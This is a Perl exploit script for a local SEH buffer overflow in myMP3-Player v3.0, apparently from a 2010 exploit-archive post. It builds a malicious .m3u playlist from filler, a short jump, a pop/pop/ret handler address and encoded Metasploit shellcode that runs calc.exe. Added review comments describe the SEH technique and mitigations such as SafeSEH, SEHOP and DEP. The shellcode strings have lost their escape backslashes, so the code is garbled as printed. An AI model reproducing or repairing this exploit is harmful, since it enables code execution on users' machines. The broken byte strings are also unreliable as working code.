
myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)

Posted on 18 March 2010

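#!/usr/bin/perl
# ============================================================
# myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
# ============================================================
# Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
# Date: 18.03.2010
# Author: n3w7u
# Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html
# Version: 3.0 and the other version can't be download from serious Page, and don't be free.
# Tested on: Windows XP SP3 (ger)
#
# Purpose: writes a single-line playlist file whose contents follow the
# author's layout diagram:
#
#   [ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ]
#
# Reviewer notes:
# - This is the usual SEH-overwrite shape: filler up to the exception
#   registration record, a short jump where the "next record" pointer sits,
#   and a handler pointer aimed at a pop/pop/ret sequence.
# - The handler address is hard-coded and attributed by the author to
#   msacm32.drv on the tested system, so it is tied to that OS build and
#   language. Presumably the module is not SafeSEH-protected -- confirm.
# - SafeSEH-built modules, SEHOP (later Windows versions) and DEP are the
#   platform mitigations for this class of bug; the underlying fix is a
#   length check in the player's playlist parser.
# - Triage hint: .m3u files are plain text with short lines, so one line of
#   more than about 1 KB holding non-printable bytes is anomalous.
# - NOTE(review): the string literals below are reproduced exactly as
#   printed on the page. The escape backslashes appear to have been lost in
#   extraction, so as written these are plain ASCII strings.
use strict;
use warnings;

my $file = "evil.m3u";                 # output file, created in the current directory

my $junk = "x41" x 1040;               # filler; for myMp3 Player 5/cracked junk =1056
my $jmp  = "xEBx08x90x90";             # jmp short (occupies the next-record field)
my $seh  = "x25x12xC8x72";             # 72 C8 12 25 msacm32.drv (handler field, P/P/R)
my $nop  = "x90" x 20;                 # padding before the payload
my $nops = "x90" x 10;                 # padding after the payload

# Payload as generated by the author:
# windows/exec - 224 bytes
# http://www.metasploit.com
# Encoder: x86/call4_dword_xor
# EXITFUNC=process, CMD=calc.exe
my $buf =
    "x2bxc9x83xe9xcexe8xffxffxffxffxc0x5ex81x76" .
    "x0exa8x6ex77xcex83xeexfcxe2xf4x54x86xfexce" .
    "xa8x6ex17x47x4dx5fxa5xaax23x3cx47x45xfax62" .
    "xfcx9cxbcxe5x05xe6xa7xd9x3dxe8x99x91x46x0e" .
    "x04x52x16xb2xaax42x57x0fx67x63x76x09x4ax9e" .
    "x25x99x23x3cx67x45xeax52x76x1ex23x2ex0fx4b" .
    "x68x1ax3dxcfx78x3exfcx86xb0xe5x2fxeexa9xbd" .
    "x94xf2xe1xe5x43x45xa9xb8x46x31x99xaexdbx0f" .
    "x67x63x76x09x90x8ex02x3axabx13x8fxf5xd5x4a" .
    "x02x2cxf0xe5x2fxeaxa9xbdx11x45xa4x25xfcx96" .
    "xb4x6fxa4x45xacxe5x76x1ex21x2ax53xeaxf3x35" .
    "x16x97xf2x3fx88x2exf0x31x2dx45xbax85xf1x93" .
    "xc2x6fxfax4bx11x6ex77xcexf8x06x46x45xc7xe9" .
    "x88x1bx13x9exc2x6cxfex06xd1x5bx15xf3x88x1b" .
    "x94x68x0bxc4x28x95x97xbbxadxd5x30xddxdax01" .
    "x1dxcexfbx91xa2xadxc9x02x14xe0xcdx16x12xce";

# Three-argument open with a lexical handle: the mode can no longer be
# influenced by the file name, and every I/O step is checked instead of
# failing silently.
open my $out_fh, '>', $file or die "open $file: $!";
print {$out_fh} $junk . $jmp . $seh . $nop . $buf . $nops
    or die "write $file: $!";
close $out_fh or die "close $file: $!";

# ~ - [ [ : Inj3ct0r : ] ]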

 
